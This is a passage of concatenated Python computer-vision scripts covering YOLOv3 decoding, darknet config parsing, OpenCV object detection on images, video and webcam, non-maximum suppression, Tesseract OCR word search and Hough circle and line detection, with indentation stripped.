grid_y = torch.linspace(0, h-1, h).repeat(w,1).t().repeat(batch*num_anchors, 1, 1).view(batch*num_anchors*h*w).type_as(output) #cuda()
xs = torch.sigmoid(output[0]) + grid_x
ys = torch.sigmoid(output[1]) + grid_y
anchor_w = torch.Tensor(anchors).view(num_anchors, anchor_step).index_select(1, torch.LongTensor([0]))
anchor_h = torch.Tensor(anchors).view(num_anchors, anchor_step).index_select(1, torch.LongTensor([1]))
anchor_w = anchor_w.repeat(batch, 1).repeat(1, 1, h*w).view(batch*num_anchors*h*w).type_as(output) #cuda()
anchor_h = anchor_h.repeat(batch, 1).repeat(1, 1, h*w).view(batch*num_anchors*h*w).type_as(output) #cuda()
ws = torch.exp(output[2]) * anchor_w
hs = torch.exp(output[3]) * anchor_h
det_confs = torch.sigmoid(output[4])
cls_confs = torch.nn.Softmax(dim=1)(output[5:5+num_classes].transpose(0,1)).detach()
cls_max_confs, cls_max_ids = torch.max(cls_confs, 1)
cls_max_confs = cls_max_confs.view(-1)
cls_max_ids = cls_max_ids.view(-1)
sz_hw = h*w
sz_hwa = sz_hw*num_anchors
det_confs = convert2cpu(det_confs)
cls_max_confs = convert2cpu(cls_max_confs)
cls_max_ids = convert2cpu_long(cls_max_ids)
xs = convert2cpu(xs)
ys = convert2cpu(ys)
ws = convert2cpu(ws)
hs = convert2cpu(hs)
if validation:
cls_confs = convert2cpu(cls_confs.view(-1, num_classes))
for b in range(batch):
boxes = []
for cy in range(h):
for cx in range(w):
for i in range(num_anchors):
ind = b*sz_hwa + i*sz_hw + cy*w + cx
det_conf = det_confs[ind]
if only_objectness:
conf = det_confs[ind]
else:
conf = det_confs[ind] * cls_max_confs[ind]
if conf > conf_thresh:
bcx = xs[ind]
bcy = ys[ind]
bw = ws[ind]
bh = hs[ind]
cls_max_conf = cls_max_confs[ind]
cls_max_id = cls_max_ids[ind]
box = [bcx/w, bcy/h, bw/w, bh/h, det_conf, cls_max_conf, cls_max_id]
if (not only_objectness) and validation:
for c in range(num_classes):
tmp_conf = cls_confs[ind][c]
if c != cls_max_id and det_confs[ind]*tmp_conf > conf_thresh:
box.append(tmp_conf)
box.append(c)
boxes.append(box)
all_boxes.append(boxes)
return all_boxes
def parse_cfg(cfgfile):
blocks = []
fp = open(cfgfile, 'r')
block = None
line = fp.readline()
while line != '':
line = line.rstrip()
if line == '' or line[0] == '#':
line = fp.readline()
continue
elif line[0] == '[':
if block:
blocks.append(block)
block = dict()
block['type'] = line.lstrip('[').rstrip(']')
# set default value
if block['type'] == 'convolutional':
block['batch_normalize'] = 0
else:
key,value = line.split('=')
key = key.strip()
if key == 'type':
key = '_type'
value = value.strip()
block[key] = value
line = fp.readline()
if block:
blocks.append(block)
fp.close()
return blocks
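# Minimal illustrative use of parse_cfg (the config text below is a made-up fragment,
# not a real YOLO cfg): each [section] becomes a dict with a 'type' key plus its options.
def _parse_cfg_demo():
    import tempfile
    cfg_text = ("[net]\nwidth=416\nheight=416\nchannels=3\n"
                "[convolutional]\nfilters=16\nsize=3\nstride=1\npad=1\nactivation=leaky\n")
    with tempfile.NamedTemporaryFile("w", suffix=".cfg", delete=False) as f:
        f.write(cfg_text)
        path = f.name
    # expected: [{'type': 'net', 'width': '416', ...}, {'type': 'convolutional', 'batch_normalize': 0, ...}]
    return parse_cfg(path)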
def print_cfg(blocks):
print('layer filters size input output')
prev_width = 416
prev_height = 416
prev_filters = 3
out_filters =[]
out_widths =[]
out_heights =[]
ind = -2
for block in blocks:
ind = ind + 1
if block['type'] == 'net':
prev_width = int(block['width'])
prev_height = int(block['height'])
continue
elif block['type'] == 'convolutional':
filters = int(block['filters'])
kernel_size = int(block['size'])
stride = int(block['stride'])
is_pad = int(block['pad'])
pad = (kernel_size-1)//2 if is_pad else 0
width = (prev_width + 2*pad - kernel_size)//stride + 1
height = (prev_height + 2*pad - kernel_size)//stride + 1
print('%5d %-6s %4d %d x %d / %d %3d x %3d x%4d -> %3d x %3d x%4d' % (ind, 'conv', filters, kernel_size, kernel_size, stride, prev_width, prev_height, prev_filters, width, height, filters))
prev_width = width
prev_height = height
prev_filters = filters
out_widths.append(prev_width)
out_heights.append(prev_height)
out_filters.append(prev_filters)
elif block['type'] == 'upsample':
stride = int(block['stride'])
filters = prev_filters
width = prev_width*stride
height = prev_height*stride
print('%5d %-6s * %d %3d x %3d x%4d -> %3d x %3d x%4d' % (ind, 'upsample', stride, prev_width, prev_height, prev_filters, width, height, filters))
prev_width = width
prev_height = height
prev_filters = filters
out_widths.append(prev_width)
out_heights.append(prev_height)
out_filters.append(prev_filters)
elif block['type'] == 'route':
layers = block['layers'].split(',')
layers = [int(i) if int(i) > 0 else int(i)+ind for i in layers]
if len(layers) == 1:
print('%5d %-6s %d' % (ind, 'route', layers[0]))
prev_width = out_widths[layers[0]]
prev_height = out_heights[layers[0]]
prev_filters = out_filters[layers[0]]
elif len(layers) == 2:
print('%5d %-6s %d %d' % (ind, 'route', layers[0], layers[1]))
prev_width = out_widths[layers[0]]
prev_height = out_heights[layers[0]]
assert(prev_width == out_widths[layers[1]])
assert(prev_height == out_heights[layers[1]])
prev_filters = out_filters[layers[0]] + out_filters[layers[1]]
out_widths.append(prev_width)
out_heights.append(prev_height)
out_filters.append(prev_filters)
elif block['type'] in ['region', 'yolo']:
print('%5d %-6s' % (ind, 'detection'))
out_widths.append(prev_width)
out_heights.append(prev_height)
out_filters.append(prev_filters)
elif block['type'] == 'shortcut':
from_id = int(block['from'])
from_id = from_id if from_id > 0 else from_id+ind
print('%5d %-6s %d' % (ind, 'shortcut', from_id))
prev_width = out_widths[from_id]
prev_height = out_heights[from_id]
prev_filters = out_filters[from_id]
out_widths.append(prev_width)
out_heights.append(prev_height)
out_filters.append(prev_filters)
else:
print('unknown type %s' % (block['type']))
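# A minimal, self-contained usage sketch for parse_cfg()/print_cfg(): write a tiny
# two-block config (hypothetical layer values) to a temporary file, parse it and
# print the resulting layer table.
import tempfile
example_cfg = "[net]\nwidth=416\nheight=416\n\n[convolutional]\nbatch_normalize=1\nfilters=32\nsize=3\nstride=1\npad=1\nactivation=leaky\n"
example_file = tempfile.NamedTemporaryFile("w", suffix=".cfg", delete=False)
example_file.write(example_cfg)
example_file.close()
example_blocks = parse_cfg(example_file.name)
print_cfg(example_blocks)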
def load_conv(buf, start, conv_model):
num_w = conv_model.weight.numel()
num_b = conv_model.bias.numel()
conv_model.bias.data.copy_(torch.from_numpy(buf[start:start+num_b]))
start = start + num_b
conv_model.weight.data.copy_(torch.from_numpy(buf[start:start+num_w]).view_as(conv_model.weight.data))
start = start + num_w
return start
def load_conv_bn(buf, start, conv_model, bn_model):
num_w = conv_model.weight.numel()
num_b = bn_model.bias.numel()
bn_model.bias.data.copy_(torch.from_numpy(buf[start:start+num_b]))
start = start + num_b
bn_model.weight.data.copy_(torch.from_numpy(buf[start:start+num_b]))
start = start + num_b
bn_model.running_mean.copy_(torch.from_numpy(buf[start:start+num_b]))
start = start + num_b
bn_model.running_var.copy_(torch.from_numpy(buf[start:start+num_b]))
start = start + num_b
conv_model.weight.data.copy_(torch.from_numpy(buf[start:start+num_w]).view_as(conv_model.weight.data))
start = start + num_w
return start
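# A tiny sketch of how the two loaders above are chained when reading a darknet
# .weights buffer. The zero-filled buffer is only a stand-in; in real use "buf"
# comes from np.fromfile() on the .weights file after skipping its header.
import numpy as np
import torch.nn as nn
example_conv = nn.Conv2d(3, 16, 3, padding=1, bias=False)
example_bn = nn.BatchNorm2d(16)
example_buf = np.zeros(4 * 16 + example_conv.weight.numel(), dtype=np.float32)
example_offset = load_conv_bn(example_buf, 0, example_conv, example_bn)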
import cv2
import numpy as np
import time
CONFIDENCE = 0.5
SCORE_THRESHOLD = 0.5
IOU_THRESHOLD = 0.5
config_path = "cfg/yolov3.cfg"
weights_path = "weights/yolov3.weights"
font_scale = 1
thickness = 1
labels = open("data/coco.names").read().strip().split("\n")
colors = np.random.randint(0, 255, size=(len(labels), 3), dtype="uint8")
net = cv2.dnn.readNetFromDarknet(config_path, weights_path)
ln = net.getLayerNames()
ln = [ln[i - 1] for i in np.array(net.getUnconnectedOutLayers()).flatten()]
cap = cv2.VideoCapture(0)
while True:
_, image = cap.read()
h, w = image.shape[:2]
blob = cv2.dnn.blobFromImage(image, 1/255.0, (416, 416), swapRB=True, crop=False)
net.setInput(blob)
start = time.perf_counter()
layer_outputs = net.forward(ln)
time_took = time.perf_counter() - start
print("Time took:", time_took)
boxes, confidences, class_ids = [], [], []
# loop over each of the layer outputs
for output in layer_outputs:
# loop over each of the object detections
for detection in output:
# extract the class id (label) and confidence (as a probability) of
# the current object detection
scores = detection[5:]
class_id = np.argmax(scores)
confidence = scores[class_id]
# discard weak predictions by ensuring the detected
# probability is greater than the minimum probability
if confidence > CONFIDENCE:
# scale the bounding box coordinates back relative to the
# size of the image, keeping in mind that YOLO actually
# returns the center (x, y)-coordinates of the bounding
# box followed by the boxes' width and height
box = detection[:4] * np.array([w, h, w, h])
(centerX, centerY, width, height) = box.astype("int")
# use the center (x, y)-coordinates to derive the top-left corner of the bounding box
x = int(centerX - (width / 2))
y = int(centerY - (height / 2))
# update our list of bounding box coordinates, confidences,
# and class IDs
boxes.append([x, y, int(width), int(height)])
confidences.append(float(confidence))
class_ids.append(class_id)
# perform the non maximum suppression given the scores defined before
idxs = cv2.dnn.NMSBoxes(boxes, confidences, SCORE_THRESHOLD, IOU_THRESHOLD)
font_scale = 1
thickness = 1
# ensure at least one detection exists
if len(idxs) > 0:
# loop over the indexes we are keeping
for i in idxs.flatten():
# extract the bounding box coordinates
x, y = boxes[i][0], boxes[i][1]
w, h = boxes[i][2], boxes[i][3]
# draw a bounding box rectangle and label on the image
color = [int(c) for c in colors[class_ids[i]]]
cv2.rectangle(image, (x, y), (x + w, y + h), color=color, thickness=thickness)
text = f"{labels[class_ids[i]]}: {confidences[i]:.2f}"
# calculate text width & height to draw the transparent boxes as background of the text
(text_width, text_height) = cv2.getTextSize(text, cv2.FONT_HERSHEY_SIMPLEX, fontScale=font_scale, thickness=thickness)[0]
text_offset_x = x
text_offset_y = y - 5
box_coords = ((text_offset_x, text_offset_y), (text_offset_x + text_width + 2, text_offset_y - text_height))
overlay = image.copy()
cv2.rectangle(overlay, box_coords[0], box_coords[1], color=color, thickness=cv2.FILLED)
# add opacity (transparency to the box)
image = cv2.addWeighted(overlay, 0.6, image, 0.4, 0)
# now put the text (label: confidence %)
cv2.putText(image, text, (x, y - 5), cv2.FONT_HERSHEY_SIMPLEX,
fontScale=font_scale, color=(0, 0, 0), thickness=thickness)
cv2.imshow("image", image)
if ord("q") == cv2.waitKey(1):
break
cap.release()
cv2.destroyAllWindows()
import cv2
import numpy as np
import time
import sys
CONFIDENCE = 0.5
SCORE_THRESHOLD = 0.5
IOU_THRESHOLD = 0.5
config_path = "cfg/yolov3.cfg"
weights_path = "weights/yolov3.weights"
font_scale = 1
thickness = 1
labels = open("data/coco.names").read().strip().split("\n")
colors = np.random.randint(0, 255, size=(len(labels), 3), dtype="uint8")
net = cv2.dnn.readNetFromDarknet(config_path, weights_path)
ln = net.getLayerNames()
ln = [ln[i - 1] for i in np.array(net.getUnconnectedOutLayers()).flatten()]
# read the file from the command line
video_file = sys.argv[1]
cap = cv2.VideoCapture(video_file)
_, image = cap.read()
h, w = image.shape[:2]
fourcc = cv2.VideoWriter_fourcc(*"XVID")
out = cv2.VideoWriter("output.avi", fourcc, 20.0, (w, h))
while True:
_, image = cap.read()
h, w = image.shape[:2]
blob = cv2.dnn.blobFromImage(image, 1/255.0, (416, 416), swapRB=True, crop=False)
net.setInput(blob)
start = time.perf_counter()
layer_outputs = net.forward(ln)
time_took = time.perf_counter() - start
print("Time took:", time_took)
boxes, confidences, class_ids = [], [], []
# loop over each of the layer outputs
for output in layer_outputs:
# loop over each of the object detections
for detection in output:
# extract the class id (label) and confidence (as a probability) of
# the current object detection
scores = detection[5:]
class_id = np.argmax(scores)
confidence = scores[class_id]
# discard weak predictions by ensuring the detected
# probability is greater than the minimum probability
if confidence > CONFIDENCE:
# scale the bounding box coordinates back relative to the
# size of the image, keeping in mind that YOLO actually
# returns the center (x, y)-coordinates of the bounding
# box followed by the boxes' width and height
box = detection[:4] * np.array([w, h, w, h])
(centerX, centerY, width, height) = box.astype("int")
# use the center (x, y)-coordinates to derive the top-left corner of the bounding box
x = int(centerX - (width / 2))
y = int(centerY - (height / 2))
# update our list of bounding box coordinates, confidences,
# and class IDs
boxes.append([x, y, int(width), int(height)])
confidences.append(float(confidence))
class_ids.append(class_id)
# perform the non maximum suppression given the scores defined before
idxs = cv2.dnn.NMSBoxes(boxes, confidences, SCORE_THRESHOLD, IOU_THRESHOLD)
font_scale = 1
thickness = 1
# ensure at least one detection exists
if len(idxs) > 0:
# loop over the indexes we are keeping
for i in idxs.flatten():
# extract the bounding box coordinates
x, y = boxes[i][0], boxes[i][1]
w, h = boxes[i][2], boxes[i][3]
# draw a bounding box rectangle and label on the image
color = [int(c) for c in colors[class_ids[i]]]
cv2.rectangle(image, (x, y), (x + w, y + h), color=color, thickness=thickness)
text = f"{labels[class_ids[i]]}: {confidences[i]:.2f}"
# calculate text width & height to draw the transparent boxes as background of the text
(text_width, text_height) = cv2.getTextSize(text, cv2.FONT_HERSHEY_SIMPLEX, fontScale=font_scale, thickness=thickness)[0]
text_offset_x = x
text_offset_y = y - 5
box_coords = ((text_offset_x, text_offset_y), (text_offset_x + text_width + 2, text_offset_y - text_height))
overlay = image.copy()
cv2.rectangle(overlay, box_coords[0], box_coords[1], color=color, thickness=cv2.FILLED)
# add opacity (transparency to the box)
image = cv2.addWeighted(overlay, 0.6, image, 0.4, 0)
# now put the text (label: confidence %)
cv2.putText(image, text, (x, y - 5), cv2.FONT_HERSHEY_SIMPLEX,
fontScale=font_scale, color=(0, 0, 0), thickness=thickness)
out.write(image)
cv2.imshow("image", image)
if ord("q") == cv2.waitKey(1):
break
cap.release()
cv2.destroyAllWindows()
import time
import torch
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.patches as patches
def boxes_iou(box1, box2):
"""
Returns the IOU between box1 and box2 (i.e. intersection area divided by union area)
"""
# Get the Width and Height of each bounding box
width_box1 = box1[2]
height_box1 = box1[3]
width_box2 = box2[2]
height_box2 = box2[3]
# Calculate the area of each bounding box
area_box1 = width_box1 * height_box1
area_box2 = width_box2 * height_box2
# Find the vertical edges of the union of the two bounding boxes
mx = min(box1[0] - width_box1/2.0, box2[0] - width_box2/2.0)
Mx = max(box1[0] + width_box1/2.0, box2[0] + width_box2/2.0)
# Calculate the width of the union of the two bounding boxes
union_width = Mx - mx
# Find the horizontal edges of the union of the two bounding boxes
my = min(box1[1] - height_box1/2.0, box2[1] - height_box2/2.0)
My = max(box1[1] + height_box1/2.0, box2[1] + height_box2/2.0)
# Calculate the height of the union of the two bounding boxes
union_height = My - my
# Calculate the width and height of the area of intersection of the two bounding boxes
intersection_width = width_box1 + width_box2 - union_width
intersection_height = height_box1 + height_box2 - union_height
# If the boxes don't overlap then their IOU is zero
if intersection_width <= 0 or intersection_height <= 0:
return 0.0
# Calculate the area of intersection of the two bounding boxes
intersection_area = intersection_width * intersection_height
# Calculate the area of the union of the two bounding boxes
union_area = area_box1 + area_box2 - intersection_area
# Calculate the IOU
iou = intersection_area/union_area
return iou
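# A quick worked example of boxes_iou(); boxes are in [center_x, center_y, w, h] form.
# Two 0.4 x 0.4 boxes whose centers are 0.1 apart share a 0.3 x 0.4 patch, so the
# IOU is 0.12 / (0.16 + 0.16 - 0.12) = 0.6.
example_iou = boxes_iou([0.5, 0.5, 0.4, 0.4], [0.6, 0.5, 0.4, 0.4])
print('example IOU:', example_iou)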
def nms(boxes, iou_thresh):
"""
Performs Non-Maximal Suppression (NMS) on boxes using the iou_thresh IOU threshold
"""
# print(boxes.shape)
# If there are no bounding boxes do nothing
if len(boxes) == 0:
return boxes
# Create a PyTorch Tensor to keep track of the detection confidence
# of each predicted bounding box
det_confs = torch.zeros(len(boxes))
# Get the detection confidence of each predicted bounding box
for i in range(len(boxes)):
det_confs[i] = boxes[i][4]
# Sort the indices of the bounding boxes by detection confidence value in descending order.
# We ignore the first returned element since we are only interested in the sorted indices
_,sortIds = torch.sort(det_confs, descending = True)
# Create an empty list to hold the best bounding boxes after
# Non-Maximal Suppression (NMS) is performed
best_boxes = []
# Perform Non-Maximal Suppression
for i in range(len(boxes)):
# Get the bounding box with the highest detection confidence first
box_i = boxes[sortIds[i]]
# Check that the detection confidence is not zero
if box_i[4] > 0:
# Save the bounding box
best_boxes.append(box_i)
# Go through the rest of the bounding boxes in the list and calculate their IOU with
# respect to the previous selected box_i.
for j in range(i + 1, len(boxes)):
box_j = boxes[sortIds[j]]
# If the IOU of box_i and box_j is higher than the given IOU threshold set
# box_j's detection confidence to zero.
if boxes_iou(box_i, box_j) > iou_thresh:
box_j[4] = 0
return best_boxes
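# A small usage sketch for nms(): three boxes in [cx, cy, w, h, det_conf] form, two
# of which overlap heavily; only the higher-confidence box of that pair is kept,
# so 2 of the 3 boxes survive.
example_boxes = [[0.5, 0.5, 0.4, 0.4, 0.9], [0.52, 0.5, 0.4, 0.4, 0.6], [0.1, 0.1, 0.1, 0.1, 0.8]]
print('boxes kept after NMS:', len(nms(example_boxes, 0.4)))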
def detect_objects(model, img, iou_thresh, nms_thresh):
# Start the time. This is done to calculate how long the detection takes.
start = time.time()
# Set the model to evaluation mode.
model.eval()
# Convert the image from a NumPy ndarray to a PyTorch Tensor of the correct shape.
# The image is transposed, then converted to a FloatTensor of dtype float32, then
# Normalized to values between 0 and 1, and finally unsqueezed to have the correct
# shape of 1 x 3 x 416 x 416
img = torch.from_numpy(img.transpose(2,0,1)).float().div(255.0).unsqueeze(0)
# Feed the image to the neural network with the corresponding NMS threshold.
# The first step in NMS is to remove all bounding boxes that have a very low
# probability of detection. All predicted bounding boxes with a value less than
# the given NMS threshold will be removed.
list_boxes = model(img, nms_thresh)
# Make a new list with all the bounding boxes returned by the neural network
boxes = list_boxes[0][0] + list_boxes[1][0] + list_boxes[2][0]
# Perform the second step of NMS on the bounding boxes returned by the neural network.
# In this step, we only keep the best bounding boxes by eliminating all the bounding boxes
# whose IOU value is higher than the given IOU threshold
boxes = nms(boxes, iou_thresh)
# Stop the time.
finish = time.time()
# Print the time it took to detect objects
print('\n\nIt took {:.3f}'.format(finish - start), 'seconds to detect the objects in the image.\n')
# Print the number of objects detected
print('Number of Objects Detected:', len(boxes), '\n')
return boxes
def load_class_names(namesfile):
# Create an empty list to hold the object classes
class_names = []
# Open the file containing the COCO object classes in read-only mode
with open(namesfile, 'r') as fp:
# The coco.names file contains only one object class per line.
# Read the file line by line and save all the lines in a list.
lines = fp.readlines()
# Get the object class names
for line in lines:
# Make a copy of each line with any trailing whitespace removed
line = line.rstrip()
# Save the object class name into class_names
class_names.append(line)
return class_names
def print_objects(boxes, class_names):
print('Objects Found and Confidence Level:\n')
for i in range(len(boxes)):
box = boxes[i]
if len(box) >= 7 and class_names:
cls_conf = box[5]
cls_id = box[6]
print('%i. %s: %f' % (i + 1, class_names[cls_id], cls_conf))
def plot_boxes(img, boxes, class_names, plot_labels, color = None):
# Define a tensor used to set the colors of the bounding boxes
colors = torch.FloatTensor([[1,0,1],[0,0,1],[0,1,1],[0,1,0],[1,1,0],[1,0,0]])
# Define a function to set the colors of the bounding boxes
def get_color(c, x, max_val):
ratio = float(x) / max_val * 5
i = int(np.floor(ratio))
j = int(np.ceil(ratio))
ratio = ratio - i
r = (1 - ratio) * colors[i][c] + ratio * colors[j][c]
return int(r * 255)
# Get the width and height of the image
width = img.shape[1]
height = img.shape[0]
# Create a figure and plot the image
fig, a = plt.subplots(1,1)
a.imshow(img)
# Plot the bounding boxes and corresponding labels on top of the image
for i in range(len(boxes)):
# Get the ith bounding box
box = boxes[i]
# Get the (x,y) pixel coordinates of the lower-left and lower-right corners
# of the bounding box relative to the size of the image.
x1 = int(np.around((box[0] - box[2]/2.0) * width))
y1 = int(np.around((box[1] - box[3]/2.0) * height))
x2 = int(np.around((box[0] + box[2]/2.0) * width))
y2 = int(np.around((box[1] + box[3]/2.0) * height))
# Set the default rgb value to red
rgb = (1, 0, 0)
# Use the same color to plot the bounding boxes of the same object class
if len(box) >= 7 and class_names:
cls_conf = box[5]
cls_id = box[6]
classes = len(class_names)
offset = cls_id * 123457 % classes
red = get_color(2, offset, classes) / 255
green = get_color(1, offset, classes) / 255
blue = get_color(0, offset, classes) / 255
# If a color is given then set rgb to the given color instead
if color is None:
rgb = (red, green, blue)
else:
rgb = color
# Calculate the width and height of the bounding box relative to the size of the image.
width_x = x2 - x1
width_y = y1 - y2
# Set the position and size of the bounding box. (x1, y2) is the pixel coordinate of the
# lower-left corner of the bounding box relative to the size of the image.
rect = patches.Rectangle((x1, y2),
width_x, width_y,
linewidth = 2,
edgecolor = rgb,
facecolor = 'none')
# Draw the bounding box on top of the image
a.add_patch(rect)
# If plot_labels = True then plot the corresponding label
if plot_labels:
# Create a string with the object class name and the corresponding object class probability
conf_tx = class_names[cls_id] + ': {:.1f}'.format(cls_conf)
# Define x and y offsets for the labels
lxc = (img.shape[1] * 0.266) / 100
lyc = (img.shape[0] * 1.180) / 100
# Draw the labels on top of the image
a.text(x1 + lxc, y1 - lyc, conf_tx, fontsize = 12, color = 'k',
bbox = dict(facecolor = rgb, edgecolor = rgb, alpha = 0.6))
plt.savefig("output.jpg")
plt.show()
import cv2
import matplotlib.pyplot as plt
from utils import *
from darknet import Darknet
# Set the NMS Threshold
score_threshold = 0.6
# Set the IoU threshold
iou_threshold = 0.4
cfg_file = "cfg/yolov3.cfg"
weight_file = "weights/yolov3.weights"
namesfile = "data/coco.names"
m = Darknet(cfg_file)
m.load_weights(weight_file)
class_names = load_class_names(namesfile)
# m.print_network()
original_image = cv2.imread("images/city_scene.jpg")
original_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)
img = cv2.resize(original_image, (m.width, m.height))
# detect the objects
boxes = detect_objects(m, img, iou_threshold, score_threshold)
print(boxes[0])
print(boxes[1])
print(boxes[2])
# plot the image with the bounding boxes and corresponding object class labels
plot_boxes(original_image, boxes, class_names, plot_labels=True)
import cv2
import numpy as np
import time
import sys
import os
CONFIDENCE = 0.5
SCORE_THRESHOLD = 0.5
IOU_THRESHOLD = 0.5
# the neural network configuration
config_path = "cfg/yolov3.cfg"
# the YOLO net weights file
weights_path = "weights/yolov3.weights"
# loading all the class labels (objects)
labels = open("data/coco.names").read().strip().split("\n")
# generating colors for each object for later plotting
colors = np.random.randint(0, 255, size=(len(labels), 3), dtype="uint8")
# load the YOLO network
net = cv2.dnn.readNetFromDarknet(config_path, weights_path)
# path_name = "images/city_scene.jpg"
path_name = sys.argv[1]
image = cv2.imread(path_name)
file_name = os.path.basename(path_name)
filename, ext = file_name.rsplit(".", 1)
h, w = image.shape[:2]
# create 4D blob
blob = cv2.dnn.blobFromImage(image, 1/255.0, (416, 416), swapRB=True, crop=False)
# sets the blob as the input of the network
net.setInput(blob)
# get all the layer names
ln = net.getLayerNames()
ln = [ln[i - 1] for i in np.array(net.getUnconnectedOutLayers()).flatten()]
# feed forward (inference) and get the network output
# measure how much it took in seconds
start = time.perf_counter()
layer_outputs = net.forward(ln)
time_took = time.perf_counter() - start
print(f"Time took: {time_took:.2f}s")
boxes, confidences, class_ids = [], [], []
# loop over each of the layer outputs
for output in layer_outputs:
# loop over each of the object detections
for detection in output:
# extract the class id (label) and confidence (as a probability) of
# the current object detection
scores = detection[5:]
class_id = np.argmax(scores)
confidence = scores[class_id]
# discard weak predictions by ensuring the detected
# probability is greater than the minimum probability
if confidence > CONFIDENCE:
# scale the bounding box coordinates back relative to the
# size of the image, keeping in mind that YOLO actually
# returns the center (x, y)-coordinates of the bounding
# box followed by the boxes' width and height
box = detection[:4] * np.array([w, h, w, h])
(centerX, centerY, width, height) = box.astype("int")
# use the center (x, y)-coordinates to derive the top-left corner of the bounding box
x = int(centerX - (width / 2))
y = int(centerY - (height / 2))
# update our list of bounding box coordinates, confidences,
# and class IDs
boxes.append([x, y, int(width), int(height)])
confidences.append(float(confidence))
class_ids.append(class_id)
# perform the non maximum suppression given the scores defined before
idxs = cv2.dnn.NMSBoxes(boxes, confidences, SCORE_THRESHOLD, IOU_THRESHOLD)
font_scale = 1
thickness = 1
# ensure at least one detection exists
if len(idxs) > 0:
# loop over the indexes we are keeping
for i in idxs.flatten():
# extract the bounding box coordinates
x, y = boxes[i][0], boxes[i][1]
w, h = boxes[i][2], boxes[i][3]
# draw a bounding box rectangle and label on the image
color = [int(c) for c in colors[class_ids[i]]]
cv2.rectangle(image, (x, y), (x + w, y + h), color=color, thickness=thickness)
text = f"{labels[class_ids[i]]}: {confidences[i]:.2f}"
# calculate text width & height to draw the transparent boxes as background of the text
(text_width, text_height) = cv2.getTextSize(text, cv2.FONT_HERSHEY_SIMPLEX, fontScale=font_scale, thickness=thickness)[0]
text_offset_x = x
text_offset_y = y - 5
box_coords = ((text_offset_x, text_offset_y), (text_offset_x + text_width + 2, text_offset_y - text_height))
overlay = image.copy()
cv2.rectangle(overlay, box_coords[0], box_coords[1], color=color, thickness=cv2.FILLED)
# add opacity (transparency to the box)
image = cv2.addWeighted(overlay, 0.6, image, 0.4, 0)
# now put the text (label: confidence %)
cv2.putText(image, text, (x, y - 5), cv2.FONT_HERSHEY_SIMPLEX,
fontScale=font_scale, color=(0, 0, 0), thickness=thickness)
# cv2.imshow("image", image)
# if cv2.waitKey(0) == ord("q"):
# pass
cv2.imwrite(filename + "_yolo3." + ext, image)
import pytesseract
import cv2
import sys
import matplotlib.pyplot as plt
from PIL import Image
# read the image using OpenCV
image = cv2.imread(sys.argv[1])
# make a copy of this image to draw in
image_copy = image.copy()
# the target word to search for
target_word = sys.argv[2]
# get all data from the image
data = pytesseract.image_to_data(image, output_type=pytesseract.Output.DICT)
# get all occurrences of that word
word_occurences = [ i for i, word in enumerate(data["text"]) if word.lower() == target_word ]
for occ in word_occurences:
# extract the width, height, top and left position for that detected word
w = data["width"][occ]
h = data["height"][occ]
l = data["left"][occ]
t = data["top"][occ]
# define all the surrounding box points
p1 = (l, t)
p2 = (l + w, t)
p3 = (l + w, t + h)
p4 = (l, t + h)
# draw the 4 lines (rectangular)
image_copy = cv2.line(image_copy, p1, p2, color=(255, 0, 0), thickness=2)
image_copy = cv2.line(image_copy, p2, p3, color=(255, 0, 0), thickness=2)
image_copy = cv2.line(image_copy, p3, p4, color=(255, 0, 0), thickness=2)
image_copy = cv2.line(image_copy, p4, p1, color=(255, 0, 0), thickness=2)
plt.imsave("all_dog_words.png", image_copy)
plt.imshow(image_copy)
plt.show()
import pytesseract
import cv2
import matplotlib.pyplot as plt
import sys
from PIL import Image
# read the image using OpenCV
# from the command line first argument
image = cv2.imread(sys.argv[1])
# or you can use Pillow
# image = Image.open(sys.argv[1])
# get the string
string = pytesseract.image_to_string(image)
# print it
print(string)
# get all data
# data = pytesseract.image_to_data(image)
# print(data)
import pytesseract
import cv2
import matplotlib.pyplot as plt
from PIL import Image
# the target word to search for
target_word = "your"
cap = cv2.VideoCapture(0)
while True:
# read the image from the cam
_, image = cap.read()
# make a copy of this image to draw in
image_copy = image.copy()
# get all data from the image
data = pytesseract.image_to_data(image, output_type=pytesseract.Output.DICT)
# print the data
print(data["text"])
# get all occurrences of that word
word_occurences = [ i for i, word in enumerate(data["text"]) if word.lower() == target_word ]
for occ in word_occurences:
# extract the width, height, top and left position for that detected word
w = data["width"][occ]
h = data["height"][occ]
l = data["left"][occ]
t = data["top"][occ]
# define all the surrounding box points
p1 = (l, t)
p2 = (l + w, t)
p3 = (l + w, t + h)
p4 = (l, t + h)
# draw the 4 lines (rectangular)
image_copy = cv2.line(image_copy, p1, p2, color=(255, 0, 0), thickness=2)
image_copy = cv2.line(image_copy, p2, p3, color=(255, 0, 0), thickness=2)
image_copy = cv2.line(image_copy, p3, p4, color=(255, 0, 0), thickness=2)
image_copy = cv2.line(image_copy, p4, p1, color=(255, 0, 0), thickness=2)
cv2.imshow("image_copy", image_copy)
if cv2.waitKey(1) == ord("q"):
break
cap.release()
cv2.destroyAllWindows()
import cv2
import numpy as np
import matplotlib.pyplot as plt
import sys
# load the image
img = cv2.imread(sys.argv[1])
# convert BGR to RGB to be suitable for showing using matplotlib library
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
# make a copy of the original image
cimg = img.copy()
# convert image to grayscale
img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# apply a blur using the median filter
img = cv2.medianBlur(img, 5)
# finds the circles in the grayscale image using the Hough transform
circles = cv2.HoughCircles(image=img, method=cv2.HOUGH_GRADIENT, dp=0.9,
minDist=80, param1=110, param2=39, maxRadius=70)
for co, i in enumerate(circles[0, :], start=1):
# draw the outer circle in green
cv2.circle(cimg, (int(i[0]), int(i[1])), int(i[2]), (0, 255, 0), 2)
# draw the center of the circle in red
cv2.circle(cimg, (int(i[0]), int(i[1])), 2, (0, 0, 255), 3)
# print the number of circles detected
print("Number of circles detected:", co)
# save the image, convert to BGR to save with proper colors
# cv2.imwrite("coins_circles_detected.png", cimg)
# show the image
plt.imshow(cimg)
plt.show()
import numpy as np
import matplotlib.pyplot as plt
import cv2
cap = cv2.VideoCapture(0)
while True:
_, image = cap.read()
# convert to grayscale
grayscale = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# perform edge detection
edges = cv2.Canny(grayscale, 30, 100)
# detect lines in the image using hough lines technique
lines = cv2.HoughLinesP(edges, 1, np.pi/180, 60, np.array([]), 50, 5)
# iterate over the output lines and draw them
for line in lines:
for x1, y1, x2, y2 in line:
cv2.line(image, (x1, y1), (x2, y2), (255, 0, 0), 3)
